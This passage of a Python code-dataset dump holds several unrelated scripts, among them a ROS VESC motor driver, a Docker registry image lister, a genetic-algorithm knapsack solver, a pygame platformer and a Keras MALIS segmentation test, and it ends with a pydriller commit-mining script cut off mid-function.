self.motor.set_servo((((self.rev_steer_offset - 27.6) / 30) * steer + (50 - self.rev_steer_offset)) / 100) (wrong)\n else:\n self.motor.set_servo((50 - steer*1.4 + self.steer_offset) / 100)\n # self.motor.set_servo((((self.steer_offset - 27.6) / 30) * steer + (50 - self.rev_steer_offset)) / 100) (wrong)\n \n rospy.sleep(0.02)\n self.motor.set_rpm(int(speed*100))\n # motor.set_rpm(1000)\n # motor.set_duty_cycle(speed/100)\n rospy.sleep(0.02)\n measurements = self.motor.get_measurements()\n \n tacho = int(measurements.tachometer)\n D_tacho = tacho - self.last_tacho\n self.last_tacho = tacho\n if abs(D_tacho) > self.tacho_jitter_threshold:\n self.tacho_err += D_tacho\n tacho -= self.tacho_err\n \n \n except Exception as e:\n self.handleException(e)\n tacho = self.set_and_get_vesc(speed, steer)\n\n 
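# reaching this line means the serial transaction (or one of its retries)\n # succeeded, so the consecutive-error counter is cleared before returning.\n 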
self.errCount = 0\n return tacho\n\n def handleException(self,e):\n rospy.logwarn(e)\n self.errCount += 1\n if self.errCount >= self.max_errCount:\n rospy.logerr(\"VESC driver error!\")\n rospy.logerr(e)\n if self.motor.serial_port.is_open:\n self.motor.set_rpm(0)\n rospy.sleep(0.1)\n self.motor.set_servo(0.5)\n rospy.sleep(0.1)\n self.motor.stop_heartbeat()\n rospy.sleep(0.1)\n self.motor.serial_port.flush()\n rospy.sleep(0.1)\n self.motor.serial_port.close()\n raise # out of retries: propagate the original exception after shutting down the port\n\n\nif __name__ == '__main__':\n rospy.init_node('RC_vesc_driver', anonymous=True)\n driver = RC_driver()\n rate = rospy.Rate(20)\n \n while not rospy.is_shutdown():\n driver.feedback_msg.tacho.data = driver.set_and_get_vesc(driver.speed_cmd, driver.steer_cmd) - driver.init_tacho\n # rospy.loginfo(driver.feedback_msg.tacho.data)\n # rospy.loginfo(\"speed: %f\",driver.speed_cmd)\n driver.feedbackPublisher.publish(driver.feedback_msg)\n rate.sleep()\n \n driver.motor.set_rpm(0)\n rospy.sleep(0.1)\n driver.motor.set_servo(0.5)\n rospy.sleep(0.1)\n driver.motor.stop_heartbeat()\n if driver.motor.serial_port.is_open:\n driver.motor.serial_port.flush()\n driver.motor.serial_port.close()","sub_path":"IROL_RC/rccar_jetson/src/vesc_controller_auto.py","file_name":"vesc_controller_auto.py","file_ext":"py","file_size_in_byte":6835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"276651733","text":"import turtle\n\ndef sier(l, d):\n if d == 0:\n t.begin_fill()\n for i in range(0,3):\n t.fd(l)\n t.left(120)\n t.end_fill()\n\n else:\n sier(l/2,d-1)\n t.fd(l/2)\n sier(l/2,d-1)\n t.bk(l/2)\n t.left(60)\n t.fd(l/2)\n t.right(60)\n sier(l/2,d-1)\n t.left(60)\n t.bk(l/2)\n t.right(60)\n\nwindow = turtle.Screen()\nt = turtle.Turtle()\nt.color(\"blue\",\"green\")\nt.speed(0)\nsier(200,3)\nwindow.exitonclick()\n","sub_path":"python/gadgets/draw_sierpinski_triangle.py","file_name":"draw_sierpinski_triangle.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"79204472","text":"from pymongo import MongoClient\n\n\nclient = MongoClient('127.0.0.1', 27017)\n\n# # inspect the connection\n# print(client.address)\n# print(client.database_names())\n\n# create a database object\ndb = client['python5']\n# create a collection object\ncol = db['test']\n\n# # insert documents\n# col.insert({'data': 1})\n# col.insert([{'name': 'xiao', 'age': 12}, {'name': 'zhang', 'age': 19}])\n\n# # find returns a cursor object\n# temp = col.find()\n# for data in temp:\n# print(data)\n\n# # fetch a single document\n# data = col.find_one()\n# print(data)\n\n# # delete documents\n# col.remove({'data': 1})\n# temp = col.find()\n# for data in temp:\n# print(data)\n\n# update\ncol.update({'name': 'bob'}, {'$set': {'age': 20}}, upsert=True)\ntemp = col.find()\nfor data in temp:\n print(data)\n\n# print(db.collection_names())\n\n","sub_path":"14_pymongo_test.py","file_name":"14_pymongo_test.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"132267305","text":"#!/usr/bin/env python3\n\n#[of]:imports\nimport os\nimport sys\nimport re\n\nimport datetime\n\n#[of]:imports with auto pkg update\nimport pkg_resources\nfrom distutils.version import LooseVersion\n#[of]:import py/yaml\nif len(sys.argv) > 1 and sys.argv[1] == \"--module_installed_pyyaml\":\n sys.argv.pop(1)\n try:\n pkg_version = pkg_resources.get_distribution(\"pyyaml\").version\n except pkg_resources.DistributionNotFound:\n sys.exit(\"\"\"We were unable to auto-install dependencies please run and 
investigate:\n pip3 install --upgrade --user pyyaml\"\"\")\nelse:\n try:\n pkg_version = pkg_resources.get_distribution(\"pyyaml\").version\n except pkg_resources.DistributionNotFound:\n os.system('pip3 install --upgrade --user pyyaml' + \"> /dev/null 2>&1\")\n sys.argv.insert(1,\"--module_installed_pyyaml\")\n os.execl(sys.executable, sys.executable, * sys.argv)\nif LooseVersion(pkg_version) < LooseVersion(\"5.1\"):\n sys.exit(\"\"\"We were unable to auto-install pyyaml >= 5.1 please run and investigate:\n pip3 install --upgrade --user pyyaml\"\"\")\n\nimport yaml\n#[cf]\n#[of]:import requests\nif len(sys.argv) > 1 and sys.argv[1] == \"--module_installed_requests\":\n sys.argv.pop(1)\n try:\n pkg_version = pkg_resources.get_distribution(\"requests\").version\n except pkg_resources.DistributionNotFound:\n print(\"e1 \" + str(sys.argv))\n sys.exit(\"\"\"We were unable to auto-install dependencies please run and investigate:\n pip3 install --upgrade --user requests\"\"\")\nelse:\n try:\n pkg_version = pkg_resources.get_distribution(\"requests\").version\n except pkg_resources.DistributionNotFound:\n print(\"e2 \" + str(sys.argv))\n os.system('pip3 install --upgrade --user requests' + \"> /dev/null 2>&1\")\n sys.argv.insert(1,\"--module_installed_requests\")\n os.execl(sys.executable, sys.executable, * sys.argv)\nif LooseVersion(pkg_version) < LooseVersion(\"2.22\"):\n print(\"e3 \" + str(sys.argv))\n sys.exit(\"\"\"We were unable to auto-install requests >= 2.22 please run and investigate:\n pip3 install --upgrade --user requests\"\"\")\n\nimport requests\n#[cf]\n#[cf]\n\nimport base64\n\nimport shlex\nimport time\nimport argparse\nimport configparser\nfrom configparser import RawConfigParser as ConfigParser, NoSectionError, NoOptionError\n\nimport json\n\n#[cf]\n#[of]:functions\n#[of]:rest\ndef to_yaml(data):\n return yaml.safe_dump(data, indent=2, default_flow_style=False, explicit_start=True)\ndef to_json(data):\n return json.dumps(data)\n#[cf]\n#[of]:web\n#[of]:def http_get(path)\\:\ndef http_get(path):\n return http_req('GET', path, None)\n#[cf]\n#[of]:def http_post(path, body=None)\\:\ndef http_post(path, body=None):\n return http_req('POST', path, body)\n#[cf]\n#[of]:def http_put(path, body=None)\\:\ndef http_put(path, body=None):\n return http_req('PUT', path, body)\n#[cf]\n#[of]:def http_delete(path)\\:\ndef http_delete(path):\n return http_req('DELETE', path, None)\n#[cf]\n#[of]:def http_req(method, path, body)\ndef http_req(method, path, body):\n DEFAULT_TIMEOUT = 300\n DEFAULT_RETRY_AFTER_SECONDS = 5\n MAX_RETRIES = DEFAULT_TIMEOUT / DEFAULT_RETRY_AFTER_SECONDS\n\n for _ in range(int(MAX_RETRIES)):\n try:\n res = requests.request(method, path, headers=http_headers(), data=body, timeout=DEFAULT_TIMEOUT)\n if str(res.status_code) in ('423', '409', '422'):\n raise ResourceBusy(res, path)\n if str(res.status_code) in ('429'):\n raise RateLimited(res, path)\n if re.search('^2\\d\\d', str(res.status_code)) is None:\n raise HttpRequestError(res, path)\n except RateLimited:\n print(\"Rate limited, retrying in \" + str(DEFAULT_RETRY_AFTER_SECONDS) + \" seconds\")\n time.sleep(DEFAULT_RETRY_AFTER_SECONDS)\n continue\n except ResourceBusy:\n print(\"Resource busy, retrying in \" + str(DEFAULT_RETRY_AFTER_SECONDS) + \" seconds\")\n time.sleep(DEFAULT_RETRY_AFTER_SECONDS)\n continue\n except requests.exceptions.ConnectionError as errc:\n print(\"Error Connecting:\",errc)\n sys.exit(1)\n # except HttpRequestError as e:\n # print(\"http error {}, {}, {}\".format(e.message, e.code, e.body))\n # 
sys.exit(1)\n else:\n return res\n else:\n raise HttpRetryLimit(path)\n\n# except requests.exceptions.HTTPError as errh:\n# print(\"Http Error:\",errh)\n# except requests.exceptions.ConnectionError as errc:\n# print(\"Error Connecting:\",errc)\n# except requests.exceptions.Timeout as errt:\n# print(\"Timeout Error:\",errt)\n# except requests.exceptions.RequestException as err:\n# print(\"OOps: Something Else\",err)\n\n#[of]:class Error(Exception)\\:\nclass Error(Exception):\n \"\"\"Base class for other exceptions\"\"\"\n pass\n#[cf]\n#[of]:class RateLimited(Error)\\:\nclass RateLimited(Error):\n def __init__(self, res, message):\n self.code = res.status_code\n self.reason = res.reason\n self.message = message\n print(\"http rate limited, {} {}, {}\".format(self.code, self.reason, self.message))\n#[cf]\n#[of]:class ResourceBusy(Error)\\:\nclass ResourceBusy(Error):\n def __init__(self, res, message):\n self.code = res.status_code\n self.reason = res.reason\n self.message = message\n print(\"http busy, {} {}, {}\".format(self.code, self.reason, self.message))\n#[cf]\n#[of]:class HttpRequestError(Error)\\:\nclass HttpRequestError(Error):\n def __init__(self, res, message):\n self.code = res.status_code\n self.reason = res.reason\n self.message = message\n print(\"http error, {} {}, {}\".format(self.code, self.reason, self.message))\n sys.exit(1)\n#[cf]\n#[of]:class HttpRetryLimit(Error)\\:\nclass HttpRetryLimit(Error):\n def __init__(self, message):\n self.message = message\n print(\"http reached retry limit connecting to \" + message)\n sys.exit(1)\n#[cf]\n#[cf]\n#[of]:def http_headers\ndef http_headers():\n return {\n 'Content-Type' : 'application/json',\n 'Accept' : 'application/vnd.docker.distribution.manifest.v2+json'\n }\n#[c] 'Authorization' : http_auth_header(),\n#[cf]\n#[cf]\n#[cf]\n\nif len(sys.argv) != 2:\n print(\"Too few arguments - Must have\", 1, \"argument(s)\")\n print(\"USAGE:\" , sys.argv[0], \"<docker_repo_address>\")\n print(\"EXAMPLE:\" , sys.argv[0], \"10.10.61.17:5000\")\n sys.exit(1)\n\nbase_url = \"http://\" + sys.argv[1]\n\nres = http_get(base_url + \"/v2/_catalog\")\nimage_names = json.loads(res.text)['repositories']\n#[c]sorted(image_names, key = lambda i: i.lower())\nfor image_name in image_names:\n res = http_get(base_url + '/v2/' + image_name + '/tags/list')\n image_tags = json.loads(res.text)['tags']\n # print(image_name + \"\\n\" + to_yaml(image_tags))\n for image_tag in image_tags:\n # print(image_name + \":\" + image_tag)\n res = http_get(base_url + '/v2/' + image_name + '/manifests/' + image_tag)\n body = json.loads(res.text)\n digest = res.headers['Docker-Content-Digest']\n print(image_name + \":\" + image_tag + \" \" + digest)\n\n#[c] print(to_yaml(body))\n\n\n# vim:number:tabstop=2:shiftwidth=2:autoindent:foldmethod=marker:foldlevel=0:foldmarker=#[of],#[cf]\n","sub_path":"image-list.py","file_name":"image-list.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"551579354","text":"#-*- coding:utf-8 -*-\n\nimport sys\nfrom PyQt4 import QtCore, QtGui, uic\n\nclass MyDialog(QtGui.QDialog):\n def __init__(self):\n QtGui.QWidget.__init__(self)\n uic.loadUi(\"res.ui\",self)\n\nclass MyWindow(QtGui.QWidget):\n def __init__(self):\n QtGui.QWidget.__init__(self)\n self.setWindowTitle('PyQt')\n self.resize(300,200)\n gridlayout = QtGui.QGridLayout()\n self.button = QtGui.QPushButton('CreateDialog')\n gridlayout.addWidget(self.button,1 ,1)\n 
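# attach the layout and connect the button to OnButton, which opens the\n # res.ui dialog and copies its lineEdit text back onto this button\n 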
self.setLayout(gridlayout)\n        self.connect(self.button, QtCore.SIGNAL('clicked()'),\n                     self.OnButton)\n\n    def OnButton(self):\n        dialog = MyDialog()\n        r = dialog.exec_()\n        if r:\n            self.button.setText(dialog.lineEdit.text())\n\napp = QtGui.QApplication(sys.argv)\nmywindow = MyWindow()\nmywindow.show()\napp.exec_()\n","sub_path":"TaoBao/TaoBaoSearchMachine-master/pyqt example/PyQtRes.py","file_name":"PyQtRes.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"477296711","text":"import sys\nimport os\nmodule_path = os.path.abspath(os.path.join('..'))\nif module_path not in sys.path:\n    sys.path.append(module_path)\nimport random\nimport copy\nimport numpy as np\nfrom timeit import default_timer as timer\n\nfrom lib.solution import Solution\nfrom lib.instance import Instance\nfrom lib.item import Item\n\n\nclass Genetic():\n    def __init__(self, inst, opts):\n        self.inst = inst\n        self.opts = opts\n        self.sol = Solution()\n\n    def run(self):\n        start = timer()\n        self.__run()\n        end = timer()\n\n        self.sol.time = end - start\n        self.sol.price = self.sol.gen_data[\"max\"][-1]\n        self.sol.rel_err = abs(self.sol.price - self.inst.opt_price) / \\\n            max(self.inst.opt_price, self.sol.price)\n\n    def __run(self):\n        self.__init_generation()\n\n        for _ in range(self.opts[\"g\"]):\n            gen = []\n\n            gen.append(self.__find_elite())\n            while len(gen) < len(self.prev_gen):\n                parents = self.__tournament()\n                offsprings = self.__crossover(parents)\n                offsprings = self.__mutate(offsprings)\n                gen += offsprings\n\n            self.prev_gen = gen\n            self.__add_sol_data()\n\n    def __init_generation(self):\n        self.prev_gen = []\n        pop_size = (self.opts[\"p\"], self.inst.size)\n        confs = np.random.randint(2, size=pop_size).tolist()\n\n        for conf in confs:\n            fitness = self.__calc_fitness(conf)\n            self.prev_gen.append(Individual(conf, fitness))\n\n        self.__add_sol_data()\n\n    def __tournament(self):\n        sample1 = random.sample(self.prev_gen, k=5)\n        sample2 = random.sample(self.prev_gen, k=5)\n\n        tour1 = self.__find_fittest_two(sample1)\n        tour2 = self.__find_fittest_two(sample2)\n\n        parents = self.__find_fittest_two(tour1 + tour2)\n\n        return parents\n\n    def __crossover(self, parents):\n        if random.random() > self.opts[\"c\"]:\n            return copy.deepcopy(parents)\n\n        p1, p2 = sorted(random.sample(list(range(self.inst.size)), k=2))\n        p_conf1, p_conf2 = parents[0].conf, parents[1].conf\n\n        # two-point crossover: swap the middle segment; slice bounds fixed so both offspring keep length inst.size\n        o_conf1 = p_conf1[:p1] + p_conf2[p1:p2] + p_conf1[p2:]\n        o_conf2 = p_conf2[:p1] + p_conf1[p1:p2] + p_conf2[p2:]\n        fitness1 = self.__calc_fitness(o_conf1)\n        fitness2 = self.__calc_fitness(o_conf2)\n        i1 = Individual(o_conf1, fitness1)\n        i2 = Individual(o_conf2, fitness2)\n\n        return [i1, i2]\n\n    def __mutate(self, offsprings):\n        for offspring in offsprings:\n            if random.random() > self.opts[\"m\"]:\n                continue\n            rand_idx = random.choice(list(range(self.inst.size)))\n            offspring.conf[rand_idx] = int(not offspring.conf[rand_idx])\n            offspring.fitness = self.__calc_fitness(offspring.conf)\n\n        return offsprings\n\n    def __find_fittest_two(self, sample):\n        sample = sorted(sample, key=lambda x: x.fitness, reverse=True)\n        return [sample[0], sample[1]]\n\n    def __find_elite(self):\n        return copy.deepcopy(max(self.prev_gen, key=lambda x: x.fitness))\n\n    def __calc_fitness(self, conf):\n        w_sum = self.inst.calc_weight(conf)\n        if w_sum <= self.inst.capacity:\n            return self.inst.calc_price(conf)\n        else:\n            return 0\n\n    def __add_sol_data(self):\n        mean_f = np.mean(list(map(lambda x: x.fitness, self.prev_gen)))\n        
max_f = max(self.prev_gen, key=lambda x: x.fitness).fitness\n\n self.sol.gen_data[\"mean\"].append(mean_f)\n self.sol.gen_data[\"max\"].append(max_f)\n\n\nclass Individual():\n def __init__(self, conf, fitness):\n self.conf = conf\n self.fitness = fitness\n","sub_path":"genetic/genetic.py","file_name":"genetic.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"119644490","text":"import pygame, math, sys, random\nfrom pygame.locals import *\nscreen = pygame.display.set_mode((1024, 576))\nclock = pygame.time.Clock()\n\nclass Platform:\n\n\tdef __init__(self, position, image, fall_through = False):\n\t\t#pygame.sprite.Sprite.__init__(self)\n\t\tself.image = pygame.image.load(image)\n\t\timage_rect = self.image.get_rect()\n\t\tself.x = position[0]\n\t\tself.y = position[1]\n\t\tnum = image_rect.width / 30\n\t\tself.rect = Rect(self.x - image_rect.width / 2, self.y, image_rect.width, image_rect.height)\n\t\tboundary_top = Rect(self.rect.left, self.rect.top + num, self.rect.width, num)\n\t\tboundary_bottom = Rect(self.rect.left + num, self.rect.bottom - num, self.rect.width - 2 * num, num)\n\t\tboundary_left = Rect(self.rect.left, self.rect.top + 2 * num, num, self.rect.height - 2 * num)\n\t\tboundary_right = Rect(self.rect.right - num, self.rect.top + 2 * num, num, self.rect.height - 2 * num)\n\t\tself.boundaries = [boundary_top, boundary_bottom, boundary_left, boundary_right]\n\t\tself.fall_through = fall_through \n\n\tdef draw(self):\n\t\tscreen.blit(self.image, self.rect)\n\t\t# colors = [(255,255,0), (255,0,0), (0,255,0), (0,0,255)]\n\t\t# for i in range(len(self.boundaries)):\n\t\t# \tpygame.draw.rect(screen, colors[i], self.boundaries[i], 0) #uncomment to see center \n\n\nclass Map:\n\tMAP_MASTER = {\"Final Destination\": (\"../resources/Backgrounds/BG_SPACE.png\", (Platform((screen.get_width() / 2, screen.get_height() / 2), \"../resources/Platforms/Final_Dest.png\"),)),\n\t\"Battlefield\": (\"../resources/Backgrounds/BG_Dark.png\", (Platform((screen.get_width() / 2, screen.get_height() / 2), \"../resources/Platforms/Battlefield_Bottom.png\"),\n\tPlatform((3 * screen.get_width() / 8, 3 * screen.get_height() / 8), \"../resources/Platforms/Battlefield_Left.png\", fall_through = True), Platform((5 * screen.get_width() / 8, 3 * screen.get_height() / 8), \"../resources/Platforms/Battlefield_Right.png\", fall_through = True),\n\tPlatform((screen.get_width() / 2, 1 * screen.get_height() / 4), \"../resources/Platforms/Battlefield_Top.png\", fall_through = True)))}\n\tdef __init__(self, name, background_image = \"default\"):\n\t\tself.name = name\n\t\tself.platforms = []\n\t\tif background_image == \"default\":\n\t\t\tbackground_image = self.MAP_MASTER[name][0]\n\t\t\tself.platforms.extend(self.MAP_MASTER[name][1])\n\t\tself.background_image = pygame.image.load(background_image)\n\t\t\n\tdef draw(self):\n\t\tpygame.display.set_caption(self.name)\n\t\tscreen.blit(self.background_image, (0,0))\n\t\tfor plat in self.platforms:\n\t\t\tplat.draw()\n\t\t#self.screen\n\nclass Ball:\n\tACCELERATION = 0.5\n\tmax_forward_speed = 7.8\n\tMAX_X_SPEED = 5\n\n\tdef __init__(self, position, platforms = []):\n\t\t#pygame.sprite.Sprite.__init__(self)\n\t\tself.position = position\n\t\tself.speed = 0\n\t\tself.k_up = self.k_down = 0\n\t\tself.platforms = platforms\n\t\tself.radius = 4\n\t\tself.touching_platform = False\n\t\tself.velx = 0\n\t\tself.jump_ctr = 2\n\t\tself.rect = self.get_rect()\n\t\tself.fast_falling = 
False\n\t\tself.accx = 0\n\n\tdef draw(self):\n\t\tpygame.draw.circle(screen, (255, 0, 0), (int(self.position[0]), int(self.position[1])), self.radius, 0)\n\t\t#pygame.draw.rect(screen, (255,255,255), self.bottom_box, 0)\n\n\tdef add_platforms(self, platforms):\n\t\tself.platforms.extend(platforms)\n\n\tdef get_rect(self):\n\t\treturn Rect(self.position, (self.radius, self.radius))\n\n\tdef jump(self):\n\t\tx, y = self.position\n\t\tif self.jump_ctr == 2:\n\t\t\t#self.move(x, y - 30)\n\t\t\tself.speed = -10\n\t\t\tself.jump_ctr -= 1\n\t\telif self.jump_ctr == 1:\n\t\t\tself.speed = -8\n\t\t\tself.jump_ctr -= 1\n\n\n\tdef move(self, x, y):\n\t\tself.position = (x, y)\n\t\tself.rect = self.get_rect()\n\n\tdef update(self, deltat):\n\t\tx, y = self.position\n\t\tself.velx *= 0.8\n\t\tself.velx += self.accx\n\n\t\tx += self.velx\n\t\ty += self.speed\n\t\t#self.accx = 0\n\t\t# clamp horizontal speed (the original comparisons 'velx > abs(MAX) and velx < 0' could never both be true, so no clamping ever happened)\n\t\tif self.velx < -self.MAX_X_SPEED:\n\t\t\tself.velx = -self.MAX_X_SPEED\n\t\telif self.velx > self.MAX_X_SPEED:\n\t\t\tself.velx = self.MAX_X_SPEED\n\t\tself.move(x, y)\n\t\tif not self.touching_platform and self.fast_falling:\n\t\t\tself.speed += self.ACCELERATION * 2\n\t\telif not self.touching_platform:\n\t\t\tself.speed += self.ACCELERATION\n\t\tif self.speed > self.max_forward_speed:\n\t\t\tself.speed = self.max_forward_speed\n\t\tself.max_forward_speed = 7.8\n\t\t#self.move(x, y)\n\n\t\t# if len(pygame.sprite.spritecollide(self, self.platforms, False)) > 0:\n\t\t# print(self.rect.left, self.rect.top)\n\t\t# print(self.platforms[0].boundary_rect.left, self.platforms[0].boundary_rect.top)\n\t\t\n\t\tif y >= 570:\n\t\t\tself.move(screen.get_width() / 2, 0)\n\t\t\tself.speed = 0\n\t\t\tself.velx = 0\n\n\n\n\t\tfor platform in self.platforms:\n\t\t\tboundary_rect = platform.boundaries[0]\n\t\t\tif self.rect.colliderect(boundary_rect) and self.speed >= 0 and (not self.fast_falling or not platform.fall_through): #and not platform.fall_through: \n\t\t\t\t#if self.rect.bottom > boundary_rect.top and self.rect.bottom - boundary_rect.top > 0:\n\t\t\t\t#print(2)\n\t\t\t\tself.touching_platform = True\n\t\t\t\tself.speed = 0 \n\t\t\t\tself.move(x, boundary_rect.top - self.radius)\t\t\n\t\t\t\tself.jump_ctr = 2\t\n\t\t\t\t# self.speed *= -1\n\t\t\t\t#self.velx = 0\n\t\t\tif not self.rect.colliderect(boundary_rect) and not platform.fall_through:\n\t\t\t\tif self.rect.colliderect(platform.boundaries[1]):\n\t\t\t\t\tself.speed = 0 \n\t\t\t\t\tself.move(x, platform.boundaries[1].bottom + self.radius )\t\t\n\t\t\t\t\t#self.velx = 0\n\t\t\t\t\tself.touching_platform = False\n\t\t\t\telif self.rect.colliderect(platform.boundaries[2]):\n\t\t\t\t\t#self.speed = 0 \n\t\t\t\t\tself.move(platform.boundaries[2].left - self.radius, y)\t\t\n\t\t\t\t\tself.velx = 0\n\t\t\t\t\tself.touching_platform = False\n\t\t\t\telif self.rect.colliderect(platform.boundaries[3]):\n\t\t\t\t\t#self.speed = 0 \n\t\t\t\t\tself.move(platform.boundaries[3].right + self.radius, y)\t\t\n\t\t\t\t\tself.velx = 0\n\t\t\t\t\tself.touching_platform = False\n\t\t\t\telse:\n\t\t\t\t\tself.touching_platform = False\n\t\t\telse:\n\t\t\t\tself.touching_platform = False\n\n\n#460 x 171\n\nplat_image1 = \"../resources/Platforms/Battlefield_Top.png\"\nimage1= \"../resources/Backgrounds/CastleBG.jpg\"\nmap1 = Map(\"Battlefield\")\n#map1 = Map(\"Final Destination\")\n#pygame.sprite.spritecollide(, surface_group, False)\nball = Ball((screen.get_width() / 2, 100), map1.platforms)\n\nwhile 1:\n\tdeltat = clock.tick(30)\n\tfor event in 
pygame.event.get():\n\t\tif event.type == QUIT:\n\t\t\tsys.exit(0)\n\t\tif not hasattr(event, 'key'): continue\n\t\tif event.type == KEYDOWN:\n\t\t\tif event.key == K_UP and ball.jump_ctr == 1:\n\t\t\t\tball.jump()\n\t\t\tif event.key == K_UP and ball.jump_ctr == 2:\n\t\t\t\tball.jump()\n\t\tif event.key == K_ESCAPE:\n\t\t\tsys.exit(0)\n\n\tif ball.speed == 0:\n\t\tif pygame.key.get_pressed()[pygame.K_LEFT]:\n\t\t\tball.accx = -2\n\n\t\tif pygame.key.get_pressed()[pygame.K_RIGHT]:\n\t\t\tball.accx = 2\n\n\t\tif not(pygame.key.get_pressed()[pygame.K_RIGHT] or pygame.key.get_pressed()[pygame.K_LEFT]):\n\t\t\tball.accx = 0\n\n\tif pygame.key.get_pressed()[pygame.K_DOWN]:\n\t\tball.fast_falling = True\n\t\tball.max_forward_speed *= 2\n\telse:\n\t\tball.fast_falling = False\n\tpygame.display.update()\n\tmap1.draw()\n\tball.update(deltat)\n\tball.draw()\n\n\n\t#pygame.draw.rect(screen, (0,255,0), ((screen.get_width() / 2, screen.get_height() / 2, 4, 4)), 0) #uncomment to see center \n\n\n","sub_path":"source/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"346459873","text":"from __future__ import print_function\nimport theano\nimport theano.tensor as T\nimport numpy as np\nfrom malis.theano_op import keras_malis, malis_metrics_no_theano\nimport pdb\nimport matplotlib.pyplot as plt\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Flatten, Reshape\nfrom keras.layers.convolutional import Convolution3D, MaxPooling2D\nfrom keras.optimizers import SGD\nna = np.newaxis\n\nN_SAMPLES = 6\nEDG_PER_VOX = 3\nVOLUME_SHAPE = (1,5,6,7)\nEDGEVOL_SHAPE = (EDG_PER_VOX,) + VOLUME_SHAPE[1:]\nDATA_SHAPE = (N_SAMPLES,) + VOLUME_SHAPE\n\n# create some test data\n# two objects\ngt = np.zeros(DATA_SHAPE, dtype=np.int32)\n# first sample\ngt[0, 0, :3, ...] = 1\ngt[0, 0, 3:, ...] = 2\n# second sample\ngt[1, 0, :, :3, ...] = 1\ngt[1, 0, :, 3:, ...] = 2\n# third sample\ngt[2, 0, :, :2, ...] = 1\ngt[2, 0, :, 2:, ...] = 2\ngt[3:] = 3\n\n# create data from gt\ndata=np.zeros(DATA_SHAPE)\n# first sample\ndata[0, 0, :3, ...] = 1\ndata[0, 0, 3, ...] = 0\ndata[0, 0, 4:, ...] = 1\n# second sample\ndata[1, 0, :, :3, ...] = 1\ndata[1, 0, :, 3, ...] = 0\ndata[1, 0, :, 4:, ...] = 1\n# third sample\ndata[2, 0, :, :2, ...] = 1\ndata[2, 0, :, 2, ...] = 0\ndata[2, 0, :, 3:, ...] 
= 1\ndata[3:] = 1\n\n\n# add some noise\ndata += np.random.normal(loc=0, scale=.01, size=DATA_SHAPE)\n\n# start building classifier\neta = 0.1 #learning rate\nn_epochs = 20\niterations_per_epoch = 100\nkeras_malis_loss = keras_malis(VOLUME_SHAPE[1:])\n\n# start network creation\nmodel = Sequential()\nmodel.add(Convolution3D(nb_filter=5,\n                        kernel_dim1=3,\n                        kernel_dim2=3,\n                        kernel_dim3=3,\n                        input_shape=VOLUME_SHAPE,\n                        border_mode=\"same\"))\nmodel.add(Activation(\"relu\"))\nmodel.add(Convolution3D(nb_filter=5,\n                        kernel_dim1=3,\n                        kernel_dim2=3,\n                        kernel_dim3=3,\n                        input_shape=VOLUME_SHAPE,\n                        border_mode=\"same\"))\nmodel.add(Activation(\"relu\"))\nmodel.add(Convolution3D(nb_filter=3,\n                        kernel_dim1=3,\n                        kernel_dim2=3,\n                        kernel_dim3=3,\n                        input_shape=VOLUME_SHAPE,\n                        border_mode=\"same\"))\nmodel.add(Activation(\"sigmoid\"))\nsgd = SGD(lr=eta, momentum=0.4, nesterov=True)\nmodel.compile(optimizer=sgd,  # pass the configured SGD instance; the original string \"SGD\" silently ignored eta and the momentum settings\n              loss=keras_malis_loss)\nloss_history = np.empty((n_epochs))\nfor epoch in range(n_epochs):\n    for i in range(iterations_per_epoch):\n        # train\n        training_hist = model.fit(data,\n                                  gt,\n                                  batch_size=1,\n                                  nb_epoch=1,\n                                  verbose=0)\n    # evaluate\n    pred = model.predict(data)\n    returndict = malis_metrics_no_theano(N_SAMPLES, VOLUME_SHAPE[1:], pred, gt)\n    print(returndict[\"malis_cost\"])\n    loss_history[epoch] = returndict[\"malis_cost\"]\n\nplt.figure()\nplt.plot(loss_history)\nplt.xlabel(\"epochs\")\nplt.ylabel(\"training loss\")\n\n\n\n# predict an affinity graph and compare it with the affinity graph\n# created by the true segmentation\nplot_sample = 1\nfrom malis import mknhood3d, seg_to_affgraph\npred_aff = model.predict(data)[plot_sample]\naff = seg_to_affgraph(gt[plot_sample,0], mknhood3d())\nplt.figure()\nplt.subplot(131)\nplt.pcolor(data[plot_sample,0,1], cmap=\"gray\")\nplt.title(\"data\")\nplt.subplot(132)\nplt.pcolor(aff[1,1], cmap=\"gray\")\nplt.title(\"aff from gt\")\nplt.subplot(133)\nplt.pcolor(pred_aff[1,1], cmap=\"gray\")\nplt.title(\"predicted aff\")\nplt.show()\n","sub_path":"tests/test_keras_3d.py","file_name":"test_keras_3d.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"382973287","text":"from pydriller import RepositoryMining\n\nimport argparse\nimport os\nimport datetime\nimport json\n\n\ndef should_ignore(line):\n    return line.startswith('@@') or \\\n           line.startswith('##') or \\\n           '#?#' in line or \\\n           '#@#' in line\n\n\ndef parse_by_date(repo, bgn, end):\n    lines = []\n\n    miner = RepositoryMining(repo, since=bgn, to=end)\n    for commit in miner.traverse_commits():\n        for modification in commit.modifications:\n            added = modification.diff_parsed['added']\n            for item in added:\n                line = item[1]\n                if should_ignore(line):\n                    continue\n                lines.append(line)\n\n    return lines\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--repo')\n    parser.add_argument('--output')\n    parser.add_argument('--month')\n    parser.add_argument('--period')\n\n    args = parser.parse_args()\n    if not args.repo or not args.output or not args.month or not args.period:\n        parser.print_help()\n        return\n\n    month = int(args.month)\n    period = int(args.period)\n\n    ranges = []\n    bgn = 1\n    while bgn < period:\n        end = min(bgn + 6, period)\n  